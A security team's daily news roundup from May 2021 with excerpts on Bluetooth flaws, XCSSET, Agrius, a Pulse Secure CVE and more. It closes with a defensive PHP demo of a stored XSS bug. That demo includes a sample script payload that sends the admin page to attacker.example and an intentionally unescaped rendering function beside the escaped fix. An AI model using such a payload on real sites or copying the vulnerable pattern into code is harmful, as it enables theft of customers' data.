OSN May 25, 2021

Fortify Security Team
May 25, 2021

Title: New Bluetooth Flaws Let Attackers Impersonate Legitimate Devices

Date Published: May 24, 2021

https://thehackernews.com/2021/05/new-bluetooth-flaws-let-attackers.html

Excerpt: “‘Our attacks work even when the victims are using Bluetooth’s strongest security modes, e.g., SSP and Secure Connections. Our attacks target the standardized Bluetooth authentication procedure, and are therefore effective against any standard compliant Bluetooth device,’ the researchers said. The Android Open Source Project (AOSP), Cisco, Cradlepoint, Intel, Microchip Technology, and Red Hat are among the identified vendors with products impacted by these security flaws. AOSP, Cisco, and Microchip Technology said they are currently working to mitigate the issues.”

Title: Apple Fixes MacOS Vulnerability Exploited by XCSSET Malware

Date Published: May 25, 2021

https://heimdalsecurity.com/blog/apple-fixes-macos-vulnerability-exploited-by-xcsset-malware/

Excerpt: “This threat primarily spreads via Xcode projects and maliciously modified applications created from the malware. It is not yet clear how the threat initially enters these systems. Presumably, these systems would be primarily used by developers. These Xcode projects have been modified such that upon building, these projects would run malicious code. This eventually leads to the main XCSSET malware being dropped and run on the affected system. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen.”

Title: Iranian Hacking Group Agrius Pretends to Encrypt Files for a Ransom, Destroys Them Instead

Date Published: May 25, 2021

https://www.zdnet.com/article/iranian-hacking-group-agrius-pretends-to-encrypt-files-for-a-ransom-destroys-it-instead/

Excerpt: “The group uses a combination of its own custom toolsets and readily available offensive security software to deploy either a destructive wiper or a custom wiper-turned-ransomware variant. However, unlike ransomware groups such as Maze and Conti, it doesn’t appear that Agrius is purely motivated by money — instead, the use of ransomware is a new addition and a bolt-on to attacks focused on cyberespionage and destruction.”

Title: New High-Severity Vulnerability Reported in Pulse Connect Secure VPN

Date Published: May 25, 2021

https://thehackernews.com/2021/05/new-high-severity-vulnerability.html

Excerpt: “The flaw, identified as CVE-2021-22908, has a CVSS score of 8.5 out of a maximum of 10 and impacts Pulse Connect Secure versions 9.0Rx and 9.1Rx. In a report detailing the vulnerability, the CERT Coordination Center said the issue stems from the gateway’s ability to connect to Windows file shares through a number of CGI endpoints that could be leveraged to carry out the attack.”

Title: USB Drop Attack

Date Published: May 25, 2021

https://sliitcs2.medium.com/usb-drop-attack-d8dcb8ce2e4a

Excerpt: “This attack is so successful because it takes advantage of humans’ inherent curiosity and/or ability to support others. When there is a device lying around with possibly “juicy” details on it, humans can’t help but grab it to see what’s inside. A successful intruder takes advantage of a victim’s natural interest to convince them to take a USB gadget. When a gadget is taken, the contents are almost always going to be checked by the perpetrator. Attackers will have tempting files or file names within the device to capitalize on the human traits that drew them to the device in the first place.”

Title: The New Group Policies Coming to Windows 10 21H2

Date Published: May 24, 2021

https://www.bleepingcomputer.com/news/microsoft/the-new-group-policies-coming-to-windows-10-21h2/

Excerpt: “As Microsoft continues to develop the Windows 10 21H2 feature update, we can use the preview builds to get a glimpse of the upcoming features, changes, and new group policies coming to the operating system this fall. Microsoft just released Windows 10 21H1 last week, but it was not met with much fanfare as it is not a very exciting release. Windows 10 21H2, also known as the Sun Valley update, is poised to be a much more feature-rich version, with a new UI refresh, DNS-over-HTTPS support, a modern disk management tool, new settings, and more.”

Title: Victims Lose Millions to Healthcare Related E-Crime

Date Published: May 24, 2021

https://www.helpnetsecurity.com/2021/05/25/healthcare-related-ecrime/

Excerpt: “Tactics often include offers for fake insurance cards, health insurance marketplace assistance, stolen health information, or various other scams involving medications, supplements, weight loss products, or diversion/pill mill practices. Criminals usually target victims through spam email, online advertisements, links in forums or on social media, and fraudulent websites.”

Title: Long-Lasting Malware Bot Phorpiex Adapts and Has New Ways of Deployment

Date Published: May 24, 2021

https://heimdalsecurity.com/blog/bot-phorpiex-adapts-new-ways-of-deployment/

Excerpt: “Since it was recently found out that Phorpiex has the capacity to disable Microsoft Defender, Microsoft specialists looked more closely into the botnet and found out that it is ‘modifying registry keys to disable firewall and antivirus popups or functionality, overriding proxy and browser settings, setting the loader and executables to run at startup, and adding these executables to the authorized application lists.’”

Title: Should Paying Ransoms to Attackers Be Banned?

Date Published: May 24, 2021

https://www.bankinfosecurity.com/should-paying-ransoms-to-attackers-be-banned-a-16726

Excerpt: “CNA reported being victimized by a ‘cybersecurity attack’ on March 23 that caused a network disruption and affected certain systems, including corporate email. The attack led the company to disconnect its systems, including taking down its website. CNA later confirmed it had been victimized by ransomware. But CNA has not confirmed it paid a ransom. The company did not immediately reply to a request for comment on the Bloomberg report.”

Title: Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Date Published: May 24, 2021

https://threatpost.com/reservation-system-easy-to-exploit-xss-bug/166414/

Excerpt: “An easy-to-exploit bug impacting the WordPress plugin ReDi Restaurant Reservation allows unauthenticated attackers to pilfer reservation data and customer personally identifiable information by simply submitting a malicious snippet of JavaScript code into the reservation comment field. The bug affects ReDi Restaurant Reservation versions prior to 21.0307, with a patched (v. 21.0426) version of the plugin available for download. The vulnerability (CVE-2021-24299) is a persistent cross-site scripting (XSS) bug. The flaw is not yet rated.”
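
The bug class behind this entry, shown as an added example that is not code from the plugin or from the article: a reservation comment controlled by an unauthenticated visitor is stored and later printed into the administrator’s reservation list. The demo_ function names, the sample payload and the attacker.example host are hypothetical; esc_html() is WordPress’s real escaper, shimmed here so the file also runs outside WordPress.

```php
<?php
// Added illustration (not the plugin's own code) of a stored (persistent) XSS
// in a WordPress-style reservation plugin. Names prefixed demo_ are
// hypothetical. esc_html() is WordPress's real escaper; the shim below lets
// this file run stand-alone with plain PHP.

if (!function_exists('esc_html')) {
    function esc_html(string $text): string
    {
        // Same effect WordPress's esc_html() has on HTML text content.
        return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}

// Vulnerable pattern: the visitor's comment is stored verbatim and later
// concatenated straight into the admin reservation list. Any markup the
// visitor typed, script tags included, becomes part of the admin's page.
function demo_render_comment_vulnerable(string $stored_comment): string
{
    return '<td class="comment">' . $stored_comment . '</td>';
}

// Hardened pattern: escape at the point of output, in the encoding that
// matches the context (element text here). The stored value is unchanged,
// but the browser now sees the payload as literal text rather than markup.
function demo_render_comment_safe(string $stored_comment): string
{
    return '<td class="comment">' . esc_html($stored_comment) . '</td>';
}

// Constructed sample payload: an unauthenticated visitor submits this as the
// reservation comment. When an administrator opens the reservation list, the
// script runs in the admin's authenticated session and sends the page, which
// lists other customers' reservations, to a host the attacker controls.
// attacker.example is a placeholder.
$payload = '<script>fetch("https://attacker.example/?d="'
         . ' + encodeURIComponent(document.body.innerHTML))</script>';

echo "vulnerable: ", demo_render_comment_vulnerable($payload), "\n";
echo "hardened:   ", demo_render_comment_safe($payload), "\n";
```

Running the file with `php demo.php` prints the first cell with a live `<script>` element and the second with the tag turned into `&lt;script&gt;`, which a browser renders as text. Escaping on output is the fix that covers every stored comment, including ones that reached the database before a patch; filtering on input (for example WordPress’s sanitize_textarea_field()) is a useful complement, not a substitute.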
